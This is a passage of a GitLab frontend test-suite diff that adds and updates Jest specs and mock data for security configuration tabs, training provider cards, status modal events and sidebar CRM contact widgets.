compliance-testing tab', () => { - expect(findByTestId('compliance-testing-tab').exists()).toBe(true); + it.each(expectedTabs)('renders the %s tab', (tabName) => { + expect(findByTestId(`${tabName}-tab`).exists()).toBe(true); + }); }); it('renders right amount of feature cards for given props with correct props', () => { @@ -173,6 +182,10 @@ describe('App component', () => { expect(findComplianceViewHistoryLink().exists()).toBe(false); expect(findSecurityViewHistoryLink().exists()).toBe(false); }); + + it('renders TrainingProviderList component', () => { + 
expect(findTrainingProviderList().exists()).toBe(true); + }); }); describe('Manage via MR Error Alert', () => { @@ -418,4 +431,22 @@ describe('App component', () => { expect(findSecurityViewHistoryLink().attributes('href')).toBe('test/historyPath'); }); }); + + describe('when secureVulnerabilityTraining feature flag is disabled', () => { + beforeEach(() => { + createComponent({ + augmentedSecurityFeatures: securityFeaturesMock, + augmentedComplianceFeatures: complianceFeaturesMock, + secureVulnerabilityTraining: false, + }); + }); + + it('renders correct amount of tabs', () => { + expect(findTabs()).toHaveLength(2); + }); + + it('does not render the vulnerability-management tab', () => { + expect(wrapper.findByTestId('vulnerability-management-tab').exists()).toBe(false); + }); + }); }); diff --git a/spec/frontend/security_configuration/components/training_provider_list_spec.js b/spec/frontend/security_configuration/components/training_provider_list_spec.js new file mode 100644 index 00000000000..60cc36a634c --- /dev/null +++ b/spec/frontend/security_configuration/components/training_provider_list_spec.js @@ -0,0 +1,88 @@ +import { GlLink, GlToggle, GlCard, GlSkeletonLoader } from '@gitlab/ui'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; +import VueApollo from 'vue-apollo'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import TrainingProviderList from '~/security_configuration/components/training_provider_list.vue'; +import waitForPromises from 'helpers/wait_for_promises'; +import { securityTrainingProviders, mockResolvers } from '../mock_data'; + +Vue.use(VueApollo); + +describe('TrainingProviderList component', () => { + let wrapper; + let mockApollo; + let mockSecurityTrainingProvidersData; + + const createComponent = () => { + mockApollo = createMockApollo([], mockResolvers); + + wrapper = shallowMount(TrainingProviderList, { + apolloProvider: mockApollo, + }); + }; + + const waitForQueryToBeLoaded = () => 
waitForPromises(); + + const findCards = () => wrapper.findAllComponents(GlCard); + const findLinks = () => wrapper.findAllComponents(GlLink); + const findToggles = () => wrapper.findAllComponents(GlToggle); + const findLoader = () => wrapper.findComponent(GlSkeletonLoader); + + beforeEach(() => { + mockSecurityTrainingProvidersData = jest.fn(); + mockSecurityTrainingProvidersData.mockResolvedValue(securityTrainingProviders); + + createComponent(); + }); + + afterEach(() => { + wrapper.destroy(); + mockApollo = null; + }); + + describe('when loading', () => { + it('shows the loader', () => { + expect(findLoader().exists()).toBe(true); + }); + + it('does not show the cards', () => { + expect(findCards().exists()).toBe(false); + }); + }); + + describe('basic structure', () => { + beforeEach(async () => { + await waitForQueryToBeLoaded(); + }); + + it('renders correct amount of cards', () => { + expect(findCards()).toHaveLength(securityTrainingProviders.length); + }); + + securityTrainingProviders.forEach(({ name, description, url, isEnabled }, index) => { + it(`shows the name for card ${index}`, () => { + expect(findCards().at(index).text()).toContain(name); + }); + + it(`shows the description for card ${index}`, () => { + expect(findCards().at(index).text()).toContain(description); + }); + + it(`shows the learn more link for card ${index}`, () => { + expect(findLinks().at(index).attributes()).toEqual({ + target: '_blank', + href: url, + }); + }); + + it(`shows the toggle with the correct value for card ${index}`, () => { + expect(findToggles().at(index).props('value')).toEqual(isEnabled); + }); + + it('does not show loader when query is populated', () => { + expect(findLoader().exists()).toBe(false); + }); + }); + }); +}); diff --git a/spec/frontend/security_configuration/mock_data.js b/spec/frontend/security_configuration/mock_data.js new file mode 100644 index 00000000000..cdb859c3800 --- /dev/null +++ b/spec/frontend/security_configuration/mock_data.js @@ -0,0 
+1,30 @@ +export const securityTrainingProviders = [ + { + id: 101, + name: 'Kontra', + description: 'Interactive developer security education.', + url: 'https://application.security/', + isEnabled: false, + }, + { + id: 102, + name: 'SecureCodeWarrior', + description: 'Security training with guide and learning pathways.', + url: 'https://www.securecodewarrior.com/', + isEnabled: true, + }, +]; + +export const securityTrainingProvidersResponse = { + data: { + securityTrainingProviders, + }, +}; + +export const mockResolvers = { + Query: { + securityTrainingProviders() { + return securityTrainingProviders; + }, + }, +}; diff --git a/spec/frontend/security_configuration/utils_spec.js b/spec/frontend/security_configuration/utils_spec.js index eaed4532baa..241e69204d2 100644 --- a/spec/frontend/security_configuration/utils_spec.js +++ b/spec/frontend/security_configuration/utils_spec.js @@ -1,101 +1,120 @@ -import { augmentFeatures } from '~/security_configuration/utils'; - -const mockSecurityFeatures = [ - { - name: 'SAST', - type: 'SAST', - }, -]; - -const mockComplianceFeatures = [ - { - name: 'LICENSE_COMPLIANCE', - type: 'LICENSE_COMPLIANCE', - }, -]; - -const mockFeaturesWithSecondary = [ - { - name: 'DAST', - type: 'DAST', - secondary: { - type: 'DAST PROFILES', - name: 'DAST PROFILES', +import { augmentFeatures, translateScannerNames } from '~/security_configuration/utils'; +import { SCANNER_NAMES_MAP } from '~/security_configuration/components/constants'; + +describe('augmentFeatures', () => { + const mockSecurityFeatures = [ + { + name: 'SAST', + type: 'SAST', }, - }, -]; - -const mockInvalidCustomFeature = [ - { - foo: 'bar', - }, -]; - -const mockValidCustomFeature = [ - { - name: 'SAST', - type: 'SAST', - customField: 'customvalue', - }, -]; - -const mockValidCustomFeatureSnakeCase = [ - { - name: 'SAST', - type: 'SAST', - custom_field: 'customvalue', - }, -]; - -const expectedOutputDefault = { - augmentedSecurityFeatures: mockSecurityFeatures, - 
augmentedComplianceFeatures: mockComplianceFeatures, -}; - -const expectedOutputSecondary = { - augmentedSecurityFeatures: mockSecurityFeatures, - augmentedComplianceFeatures: mockFeaturesWithSecondary, -}; - -const expectedOutputCustomFeature = { - augmentedSecurityFeatures: mockValidCustomFeature, - augmentedComplianceFeatures: mockComplianceFeatures, -}; - -describe('returns an object with augmentedSecurityFeatures and augmentedComplianceFeatures when', () => { - it('given an empty array', () => { - expect(augmentFeatures(mockSecurityFeatures, mockComplianceFeatures, [])).toEqual( - expectedOutputDefault, - ); + ]; + + const mockComplianceFeatures = [ + { + name: 'LICENSE_COMPLIANCE', + type: 'LICENSE_COMPLIANCE', + }, + ]; + + const mockFeaturesWithSecondary = [ + { + name: 'DAST', + type: 'DAST', + secondary: { + type: 'DAST PROFILES', + name: 'DAST PROFILES', + }, + }, + ]; + + const mockInvalidCustomFeature = [ + { + foo: 'bar', + }, + ]; + + const mockValidCustomFeature = [ + { + name: 'SAST', + type: 'SAST', + customField: 'customvalue', + }, + ]; + + const mockValidCustomFeatureSnakeCase = [ + { + name: 'SAST', + type: 'SAST', + custom_field: 'customvalue', + }, + ]; + + const expectedOutputDefault = { + augmentedSecurityFeatures: mockSecurityFeatures, + augmentedComplianceFeatures: mockComplianceFeatures, + }; + + const expectedOutputSecondary = { + augmentedSecurityFeatures: mockSecurityFeatures, + augmentedComplianceFeatures: mockFeaturesWithSecondary, + }; + + const expectedOutputCustomFeature = { + augmentedSecurityFeatures: mockValidCustomFeature, + augmentedComplianceFeatures: mockComplianceFeatures, + }; + + describe('returns an object with augmentedSecurityFeatures and augmentedComplianceFeatures when', () => { + it('given an empty array', () => { + expect(augmentFeatures(mockSecurityFeatures, mockComplianceFeatures, [])).toEqual( + expectedOutputDefault, + ); + }); + + it('given an invalid populated array', () => { + expect( + 
augmentFeatures(mockSecurityFeatures, mockComplianceFeatures, mockInvalidCustomFeature), + ).toEqual(expectedOutputDefault); + }); + + it('features have secondary key', () => { + expect(augmentFeatures(mockSecurityFeatures, mockFeaturesWithSecondary, [])).toEqual( + expectedOutputSecondary, + ); + }); + + it('given a valid populated array', () => { + expect( + augmentFeatures(mockSecurityFeatures, mockComplianceFeatures, mockValidCustomFeature), + ).toEqual(expectedOutputCustomFeature); + }); }); - it('given an invalid populated array', () => { - expect( - augmentFeatures(mockSecurityFeatures, mockComplianceFeatures, mockInvalidCustomFeature), - ).toEqual(expectedOutputDefault); + describe('returns an object with camelcased keys', () => { + it('given a customfeature in snakecase', () => { + expect( + augmentFeatures( + mockSecurityFeatures, + mockComplianceFeatures, + mockValidCustomFeatureSnakeCase, + ), + ).toEqual(expectedOutputCustomFeature); + }); }); +}); - it('features have secondary key', () => { - expect(augmentFeatures(mockSecurityFeatures, mockFeaturesWithSecondary, [])).toEqual( - expectedOutputSecondary, - ); +describe('translateScannerNames', () => { + it.each(['', undefined, null, 1, 'UNKNOWN_SCANNER_KEY'])('returns %p as is', (key) => { + expect(translateScannerNames([key])).toEqual([key]); }); - it('given a valid populated array', () => { - expect( - augmentFeatures(mockSecurityFeatures, mockComplianceFeatures, mockValidCustomFeature), - ).toEqual(expectedOutputCustomFeature); + it('returns an empty array if no input is provided', () => { + expect(translateScannerNames([])).toEqual([]); }); -}); -describe('returns an object with camelcased keys', () => { - it('given a customfeature in snakecase', () => { - expect( - augmentFeatures( - mockSecurityFeatures, - mockComplianceFeatures, - mockValidCustomFeatureSnakeCase, - ), - ).toEqual(expectedOutputCustomFeature); + it('returns translated scanner names', () => { + 
expect(translateScannerNames(Object.keys(SCANNER_NAMES_MAP))).toEqual( + Object.values(SCANNER_NAMES_MAP), + ); }); }); diff --git a/spec/frontend/self_monitor/components/__snapshots__/self_monitor_form_spec.js.snap b/spec/frontend/self_monitor/components/__snapshots__/self_monitor_form_spec.js.snap index 1a874c3dcd6..c968c28c811 100644 --- a/spec/frontend/self_monitor/components/__snapshots__/self_monitor_form_spec.js.snap +++ b/spec/frontend/self_monitor/components/__snapshots__/self_monitor_form_spec.js.snap @@ -52,6 +52,7 @@ exports[`self monitor component When the self monitor project has not been creat <gl-form-group-stub labeldescription="" + optionaltext="(optional)" > <gl-toggle-stub label="Self monitoring" diff --git a/spec/frontend/serverless/components/__snapshots__/empty_state_spec.js.snap b/spec/frontend/serverless/components/__snapshots__/empty_state_spec.js.snap index 53bef449c2f..c25a8d4bb92 100644 --- a/spec/frontend/serverless/components/__snapshots__/empty_state_spec.js.snap +++ b/spec/frontend/serverless/components/__snapshots__/empty_state_spec.js.snap @@ -7,8 +7,10 @@ exports[`EmptyStateComponent should render content 1`] = ` </div> <div class=\\"col-12\\"> <div class=\\"text-content gl-mx-auto gl-my-0 gl-p-5\\"> - <h1 class=\\"h4\\">Getting started with serverless</h1> - <p>In order to start using functions as a service, you must first install Knative on your Kubernetes cluster. <gl-link-stub href=\\"/help\\">More information</gl-link-stub> + <h1 class=\\"gl-font-size-h-display gl-line-height-36 h4\\"> + Getting started with serverless + </h1> + <p class=\\"gl-mt-3\\">In order to start using functions as a service, you must first install Knative on your Kubernetes cluster. 
<gl-link-stub href=\\"/help\\">More information</gl-link-stub> </p> <div class=\\"gl-display-flex gl-flex-wrap gl-justify-content-center\\"> <!----> diff --git a/spec/frontend/set_status_modal/set_status_modal_wrapper_spec.js b/spec/frontend/set_status_modal/set_status_modal_wrapper_spec.js index 3ff6d1f9597..d7261784edc 100644 --- a/spec/frontend/set_status_modal/set_status_modal_wrapper_spec.js +++ b/spec/frontend/set_status_modal/set_status_modal_wrapper_spec.js @@ -1,6 +1,6 @@ import { GlModal, GlFormCheckbox } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import { initEmojiMock } from 'helpers/emoji'; +import { initEmojiMock, clearEmojiMock } from 'helpers/emoji'; import * as UserApi from '~/api/user_api'; import EmojiPicker from '~/emoji/components/picker.vue'; import createFlash from '~/flash'; @@ -12,7 +12,6 @@ jest.mock('~/flash'); describe('SetStatusModalWrapper', () => { let wrapper; - let mockEmoji; const $toast = { show: jest.fn(), }; @@ -63,12 +62,12 @@ describe('SetStatusModalWrapper', () => { afterEach(() => { wrapper.destroy(); - mockEmoji.restore(); + clearEmojiMock(); }); describe('with minimum props', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent(); return initModal(); }); @@ -112,7 +111,7 @@ describe('SetStatusModalWrapper', () => { describe('improvedEmojiPicker is true', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent({}, true); return initModal(); }); @@ -126,7 +125,7 @@ describe('SetStatusModalWrapper', () => { describe('with no currentMessage set', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent({ currentMessage: '' }); return initModal(); }); @@ -146,7 +145,7 @@ describe('SetStatusModalWrapper', () => { describe('with no currentEmoji set', () => { beforeEach(async () => { - mockEmoji = await 
initEmojiMock(); + await initEmojiMock(); wrapper = createComponent({ currentEmoji: '' }); return initModal(); }); @@ -161,7 +160,7 @@ describe('SetStatusModalWrapper', () => { describe('with no currentMessage set', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent({ currentEmoji: '', currentMessage: '' }); return initModal(); }); @@ -174,7 +173,7 @@ describe('SetStatusModalWrapper', () => { describe('with currentClearStatusAfter set', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent({ currentClearStatusAfter: '2021-01-01 00:00:00 UTC' }); return initModal(); }); @@ -190,7 +189,7 @@ describe('SetStatusModalWrapper', () => { describe('update status', () => { describe('succeeds', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent(); await initModal(); @@ -198,7 +197,7 @@ describe('SetStatusModalWrapper', () => { }); it('clicking "removeStatus" clears the emoji and message fields', async () => { - findModal().vm.$emit('cancel'); + findModal().vm.$emit('secondary'); await wrapper.vm.$nextTick(); expect(findFormField('message').element.value).toBe(''); @@ -206,7 +205,7 @@ describe('SetStatusModalWrapper', () => { }); it('clicking "setStatus" submits the user status', async () => { - findModal().vm.$emit('ok'); + findModal().vm.$emit('primary'); await wrapper.vm.$nextTick(); // set the availability status @@ -215,7 +214,7 @@ describe('SetStatusModalWrapper', () => { // set the currentClearStatusAfter to 30 minutes wrapper.find('[data-testid="thirtyMinutes"]').vm.$emit('click'); - findModal().vm.$emit('ok'); + findModal().vm.$emit('primary'); await wrapper.vm.$nextTick(); const commonParams = { @@ -237,7 +236,7 @@ describe('SetStatusModalWrapper', () => { }); it('calls the "onUpdateSuccess" handler', async () => { - findModal().vm.$emit('ok'); + 
findModal().vm.$emit('primary'); await wrapper.vm.$nextTick(); expect(wrapper.vm.onUpdateSuccess).toHaveBeenCalled(); @@ -246,14 +245,14 @@ describe('SetStatusModalWrapper', () => { describe('success message', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent({ currentEmoji: '', currentMessage: '' }); jest.spyOn(UserApi, 'updateUserStatus').mockResolvedValue(); return initModal({ mockOnUpdateSuccess: false }); }); it('displays a toast success message', async () => { - findModal().vm.$emit('ok'); + findModal().vm.$emit('primary'); await wrapper.vm.$nextTick(); expect($toast.show).toHaveBeenCalledWith('Status updated'); @@ -262,7 +261,7 @@ describe('SetStatusModalWrapper', () => { describe('with errors', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent(); await initModal(); @@ -270,7 +269,7 @@ describe('SetStatusModalWrapper', () => { }); it('calls the "onUpdateFail" handler', async () => { - findModal().vm.$emit('ok'); + findModal().vm.$emit('primary'); await wrapper.vm.$nextTick(); expect(wrapper.vm.onUpdateFail).toHaveBeenCalled(); @@ -279,14 +278,14 @@ describe('SetStatusModalWrapper', () => { describe('error message', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent({ currentEmoji: '', currentMessage: '' }); jest.spyOn(UserApi, 'updateUserStatus').mockRejectedValue(); return initModal({ mockOnUpdateFailure: false }); }); it('flashes an error message', async () => { - findModal().vm.$emit('ok'); + findModal().vm.$emit('primary'); await wrapper.vm.$nextTick(); expect(createFlash).toHaveBeenCalledWith({ diff --git a/spec/frontend/shortcuts_spec.js b/spec/frontend/shortcuts_spec.js index 455db325066..49148123a1c 100644 --- a/spec/frontend/shortcuts_spec.js +++ b/spec/frontend/shortcuts_spec.js @@ -25,6 +25,7 @@ describe('Shortcuts', () => { 
jest.spyOn(document.querySelector('.js-new-note-form .js-md-preview-button'), 'focus'); jest.spyOn(document.querySelector('.edit-note .js-md-preview-button'), 'focus'); + jest.spyOn(document.querySelector('#search'), 'focus'); new Shortcuts(); // eslint-disable-line no-new }); @@ -111,4 +112,12 @@ describe('Shortcuts', () => { }); }); }); + + describe('focusSearch', () => { + it('focuses the search bar', () => { + Shortcuts.focusSearch(createEvent('KeyboardEvent')); + + expect(document.querySelector('#search').focus).toHaveBeenCalled(); + }); + }); }); diff --git a/spec/frontend/sidebar/components/assignees/sidebar_assignees_widget_spec.js b/spec/frontend/sidebar/components/assignees/sidebar_assignees_widget_spec.js index 39f63b2a9f4..07da4acef8c 100644 --- a/spec/frontend/sidebar/components/assignees/sidebar_assignees_widget_spec.js +++ b/spec/frontend/sidebar/components/assignees/sidebar_assignees_widget_spec.js @@ -5,7 +5,7 @@ import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; import createFlash from '~/flash'; -import { IssuableType } from '~/issue_show/constants'; +import { IssuableType } from '~/issues/constants'; import SidebarAssigneesRealtime from '~/sidebar/components/assignees/assignees_realtime.vue'; import IssuableAssignees from '~/sidebar/components/assignees/issuable_assignees.vue'; import SidebarAssigneesWidget from '~/sidebar/components/assignees/sidebar_assignees_widget.vue'; diff --git a/spec/frontend/sidebar/components/attention_required_toggle_spec.js b/spec/frontend/sidebar/components/attention_requested_toggle_spec.js index 8555068cdd8..0939297a754 100644 --- a/spec/frontend/sidebar/components/attention_required_toggle_spec.js +++ b/spec/frontend/sidebar/components/attention_requested_toggle_spec.js @@ -23,8 +23,8 @@ describe('Attention require toggle', () => { it.each` attentionRequested | icon - ${true} | ${'star'} - ${false} | ${'star-o'} + 
${true} | ${'attention-solid'} + ${false} | ${'attention'} `( 'renders $icon icon when attention_requested is $attentionRequested', ({ attentionRequested, icon }) => { diff --git a/spec/frontend/sidebar/components/crm_contacts_spec.js b/spec/frontend/sidebar/components/crm_contacts_spec.js new file mode 100644 index 00000000000..758cff30e2d --- /dev/null +++ b/spec/frontend/sidebar/components/crm_contacts_spec.js @@ -0,0 +1,87 @@ +import Vue from 'vue'; +import VueApollo from 'vue-apollo'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import waitForPromises from 'helpers/wait_for_promises'; +import createFlash from '~/flash'; +import CrmContacts from '~/sidebar/components/crm_contacts/crm_contacts.vue'; +import getIssueCrmContactsQuery from '~/sidebar/components/crm_contacts/queries/get_issue_crm_contacts.query.graphql'; +import issueCrmContactsSubscription from '~/sidebar/components/crm_contacts/queries/issue_crm_contacts.subscription.graphql'; +import { + getIssueCrmContactsQueryResponse, + issueCrmContactsUpdateResponse, + issueCrmContactsUpdateNullResponse, +} from './mock_data'; + +jest.mock('~/flash'); + +describe('Issue crm contacts component', () => { + Vue.use(VueApollo); + let wrapper; + let fakeApollo; + + const successQueryHandler = jest.fn().mockResolvedValue(getIssueCrmContactsQueryResponse); + const successSubscriptionHandler = jest.fn().mockResolvedValue(issueCrmContactsUpdateResponse); + const nullSubscriptionHandler = jest.fn().mockResolvedValue(issueCrmContactsUpdateNullResponse); + + const mountComponent = ({ + queryHandler = successQueryHandler, + subscriptionHandler = successSubscriptionHandler, + } = {}) => { + fakeApollo = createMockApollo([ + [getIssueCrmContactsQuery, queryHandler], + [issueCrmContactsSubscription, subscriptionHandler], + ]); + wrapper = shallowMountExtended(CrmContacts, { + propsData: { issueId: '123' }, + apolloProvider: fakeApollo, + 
}); + }; + + afterEach(() => { + wrapper.destroy(); + fakeApollo = null; + }); + + it('should render error message on reject', async () => { + mountComponent({ queryHandler: jest.fn().mockRejectedValue('ERROR') }); + await waitForPromises(); + + expect(createFlash).toHaveBeenCalled(); + }); + + it('calls the query with correct variables', () => { + mountComponent(); + + expect(successQueryHandler).toHaveBeenCalledWith({ + id: 'gid://gitlab/Issue/123', + }); + }); + + it('calls the subscription with correct variable for issue', () => { + mountComponent(); + + expect(successSubscriptionHandler).toHaveBeenCalledWith({ + id: 'gid://gitlab/Issue/123', + }); + }); + + it('renders correct initial results', async () => { + mountComponent({ subscriptionHandler: nullSubscriptionHandler }); + await waitForPromises(); + + expect(wrapper.find('#contact_0').text()).toContain('Someone Important'); + expect(wrapper.find('#contact_container_0').text()).toContain('si@gitlab.com'); + expect(wrapper.find('#contact_1').text()).toContain('Marty McFly'); + }); + + it('renders correct results after subscription update', async () => { + mountComponent(); + await waitForPromises(); + + const contact = ['Dave Davies', 'dd@gitlab.com', '+44 20 1111 2222', 'Vice President']; + contact.forEach((property) => { + expect(wrapper.find('#contact_container_0').text()).toContain(property); + }); + }); +}); diff --git a/spec/frontend/sidebar/components/date/sidebar_date_widget_spec.js b/spec/frontend/sidebar/components/date/sidebar_date_widget_spec.js index 619e89beb23..1e2173e2988 100644 --- a/spec/frontend/sidebar/components/date/sidebar_date_widget_spec.js +++ b/spec/frontend/sidebar/components/date/sidebar_date_widget_spec.js @@ -145,13 +145,20 @@ describe('Sidebar date Widget', () => { ${false} | ${SidebarInheritDate} | ${'SidebarInheritDate'} | ${false} `( 'when canInherit is $canInherit, $componentName display is $expected', - ({ canInherit, component, expected }) => { + async ({ canInherit, 
component, expected }) => { createComponent({ canInherit }); + await waitForPromises(); expect(wrapper.find(component).exists()).toBe(expected); }, ); + it('does not render SidebarInheritDate when canInherit is true and date is loading', async () => { + createComponent({ canInherit: true }); + + expect(wrapper.find(SidebarInheritDate).exists()).toBe(false); + }); + it('displays a flash message when query is rejected', async () => { createComponent({ dueDateQueryHandler: jest.fn().mockRejectedValue('Houston, we have a problem'), diff --git a/spec/frontend/sidebar/components/date/sidebar_inherit_date_spec.js b/spec/frontend/sidebar/components/date/sidebar_inherit_date_spec.js index 4d38eba8035..fda21e06987 100644 --- a/spec/frontend/sidebar/components/date/sidebar_inherit_date_spec.js +++ b/spec/frontend/sidebar/components/date/sidebar_inherit_date_spec.js @@ -10,7 +10,7 @@ describe('SidebarInheritDate', () => { const findFixedRadio = () => wrapper.findAll(GlFormRadio).at(0); const findInheritRadio = () => wrapper.findAll(GlFormRadio).at(1); - const createComponent = () => { + const createComponent = ({ dueDateIsFixed = false } = {}) => { wrapper = shallowMount(SidebarInheritDate, { provide: { canUpdate: true, @@ -18,11 +18,10 @@ describe('SidebarInheritDate', () => { propsData: { issuable: { dueDate: '2021-04-15', - dueDateIsFixed: true, + dueDateIsFixed, dueDateFixed: '2021-04-15', dueDateFromMilestones: '2021-05-15', }, - isLoading: false, dateType: 'dueDate', }, }); @@ -45,6 +44,13 @@ describe('SidebarInheritDate', () => { expect(findInheritRadio().text()).toBe('Inherited:'); }); + it('does not emit set-date if fixed value does not change', () => { + createComponent({ dueDateIsFixed: true }); + findFixedRadio().vm.$emit('input', true); + + expect(wrapper.emitted('set-date')).toBeUndefined(); + }); + it('emits set-date event on click on radio button', () => { findFixedRadio().vm.$emit('input', true); diff --git a/spec/frontend/sidebar/components/mock_data.js 
b/spec/frontend/sidebar/components/mock_data.js new file mode 100644 index 00000000000..70c3f8a3012 --- /dev/null +++ b/spec/frontend/sidebar/components/mock_data.js @@ -0,0 +1,56 @@ +export const getIssueCrmContactsQueryResponse = { + data: { + issue: { + id: 'gid://gitlab/Issue/123', + customerRelationsContacts: { + nodes: [ + { + id: 'gid://gitlab/CustomerRelations::Contact/1', + firstName: 'Someone', + lastName: 'Important', + email: 'si@gitlab.com', + phone: null, + description: null, + organization: null, + }, + { + id: 'gid://gitlab/CustomerRelations::Contact/5', + firstName: 'Marty', + lastName: 'McFly', + email: null, + phone: null, + description: null, + organization: null, + }, + ], + }, + }, + }, +}; + +export const issueCrmContactsUpdateNullResponse = { + data: { + issueCrmContactsUpdated: null, + }, +}; + +export const issueCrmContactsUpdateResponse = { + data: { + issueCrmContactsUpdated: { + id: 'gid://gitlab/Issue/123', + customerRelationsContacts: { + nodes: [ + { + id: 'gid://gitlab/CustomerRelations::Contact/13', + firstName: 'Dave', + lastName: 'Davies', + email: 'dd@gitlab.com', + phone: '+44 20 1111 2222', + description: 'Vice President', + organization: null, + }, + ], + }, + }, + }, +}; diff --git a/spec/frontend/sidebar/components/reference/sidebar_reference_widget_spec.js b/spec/frontend/sidebar/components/reference/sidebar_reference_widget_spec.js index cc428693930..69e35cd1d05 100644 --- a/spec/frontend/sidebar/components/reference/sidebar_reference_widget_spec.js +++ b/spec/frontend/sidebar/components/reference/sidebar_reference_widget_spec.js @@ -3,7 +3,7 @@ import Vue from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; -import { IssuableType } from '~/issue_show/constants'; +import { IssuableType } from '~/issues/constants'; import SidebarReferenceWidget from '~/sidebar/components/reference/sidebar_reference_widget.vue'; 
import issueReferenceQuery from '~/sidebar/queries/issue_reference.query.graphql'; import mergeRequestReferenceQuery from '~/sidebar/queries/merge_request_reference.query.graphql'; diff --git a/spec/frontend/sidebar/components/sidebar_dropdown_widget_spec.js b/spec/frontend/sidebar/components/sidebar_dropdown_widget_spec.js index ca6e5ac5e7f..d7471d99477 100644 --- a/spec/frontend/sidebar/components/sidebar_dropdown_widget_spec.js +++ b/spec/frontend/sidebar/components/sidebar_dropdown_widget_spec.js @@ -17,7 +17,7 @@ import { extendedWrapper } from 'helpers/vue_test_utils_helper'; import waitForPromises from 'helpers/wait_for_promises'; import createFlash from '~/flash'; import { getIdFromGraphQLId } from '~/graphql_shared/utils'; -import { IssuableType } from '~/issue_show/constants'; +import { IssuableType } from '~/issues/constants'; import { timeFor } from '~/lib/utils/datetime_utility'; import SidebarDropdownWidget from '~/sidebar/components/sidebar_dropdown_widget.vue'; import SidebarEditableItem from '~/sidebar/components/sidebar_editable_item.vue'; @@ -369,16 +369,18 @@ describe('SidebarDropdownWidget', () => { describe('when a user is searching', () => { describe('when search result is not found', () => { - it('renders "No milestone found"', async () => { - createComponent(); + describe('when milestone', () => { + it('renders "No milestone found"', async () => { + createComponent(); - await toggleDropdown(); + await toggleDropdown(); - findSearchBox().vm.$emit('input', 'non existing milestones'); + findSearchBox().vm.$emit('input', 'non existing milestones'); - await wrapper.vm.$nextTick(); + await wrapper.vm.$nextTick(); - expect(findDropdownText().text()).toBe('No milestone found'); + expect(findDropdownText().text()).toBe('No milestone found'); + }); }); }); }); diff --git a/spec/frontend/sidebar/components/time_tracking/mock_data.js b/spec/frontend/sidebar/components/time_tracking/mock_data.js index 938750bd58b..3f1b3fa8ec1 100644 --- 
a/spec/frontend/sidebar/components/time_tracking/mock_data.js +++ b/spec/frontend/sidebar/components/time_tracking/mock_data.js @@ -11,11 +11,13 @@ export const getIssueTimelogsQueryResponse = { __typename: 'Timelog', timeSpent: 14400, user: { + id: 'user-1', name: 'John Doe18', __typename: 'UserCore', }, spentAt: '2020-05-01T00:00:00Z', note: { + id: 'note-1', body: 'A note', __typename: 'Note', }, @@ -25,6 +27,7 @@ export const getIssueTimelogsQueryResponse = { __typename: 'Timelog', timeSpent: 1800, user: { + id: 'user-2', name: 'Administrator', __typename: 'UserCore', }, @@ -36,11 +39,13 @@ export const getIssueTimelogsQueryResponse = { __typename: 'Timelog', timeSpent: 14400, user: { + id: 'user-2', name: 'Administrator', __typename: 'UserCore', }, spentAt: '2021-05-01T00:00:00Z', note: { + id: 'note-2', body: 'A note', __typename: 'Note', }, @@ -65,11 +70,13 @@ export const getMrTimelogsQueryResponse = { __typename: 'Timelog', timeSpent: 1800, user: { + id: 'user-1', name: 'Administrator', __typename: 'UserCore', }, spentAt: '2021-05-07T14:44:55Z', note: { + id: 'note-1', body: 'Thirty minutes!', __typename: 'Note', }, @@ -79,6 +86,7 @@ export const getMrTimelogsQueryResponse = { __typename: 'Timelog', timeSpent: 3600, user: { + id: 'user-1', name: 'Administrator', __typename: 'UserCore', }, @@ -90,11 +98,13 @@ export const getMrTimelogsQueryResponse = { __typename: 'Timelog', timeSpent: 300, user: { + id: 'user-1', name: 'Administrator', __typename: 'UserCore', }, spentAt: '2021-03-10T00:00:00Z', note: { + id: 'note-2', body: 'A note with some time', __typename: 'Note', }, diff --git a/spec/frontend/sidebar/mock_data.js b/spec/frontend/sidebar/mock_data.js index 1ebd3c622ca..42e89a3ba84 100644 --- a/spec/frontend/sidebar/mock_data.js +++ b/spec/frontend/sidebar/mock_data.js @@ -223,6 +223,7 @@ const mockData = { export const issueConfidentialityResponse = (confidential = false) => ({ data: { workspace: { + id: '1', __typename: 'Project', issuable: { 
__typename: 'Issue', @@ -236,6 +237,7 @@ export const issueConfidentialityResponse = (confidential = false) => ({ export const issuableDueDateResponse = (dueDate = null) => ({ data: { workspace: { + id: '1', __typename: 'Project', issuable: { __typename: 'Issue', @@ -249,6 +251,7 @@ export const issuableDueDateResponse = (dueDate = null) => ({ export const issuableStartDateResponse = (startDate = null) => ({ data: { workspace: { + id: '1', __typename: 'Group', issuable: { __typename: 'Epic', @@ -265,6 +268,7 @@ export const issuableStartDateResponse = (startDate = null) => ({ export const epicParticipantsResponse = () => ({ data: { workspace: { + id: '1', __typename: 'Group', issuable: { __typename: 'Epic', @@ -290,6 +294,7 @@ export const epicParticipantsResponse = () => ({ export const issueReferenceResponse = (reference) => ({ data: { workspace: { + id: '1', __typename: 'Project', issuable: { __typename: 'Issue', @@ -303,6 +308,7 @@ export const issueReferenceResponse = (reference) => ({ export const issueSubscriptionsResponse = (subscribed = false, emailsDisabled = false) => ({ data: { workspace: { + id: '1', __typename: 'Project', issuable: { __typename: 'Issue', @@ 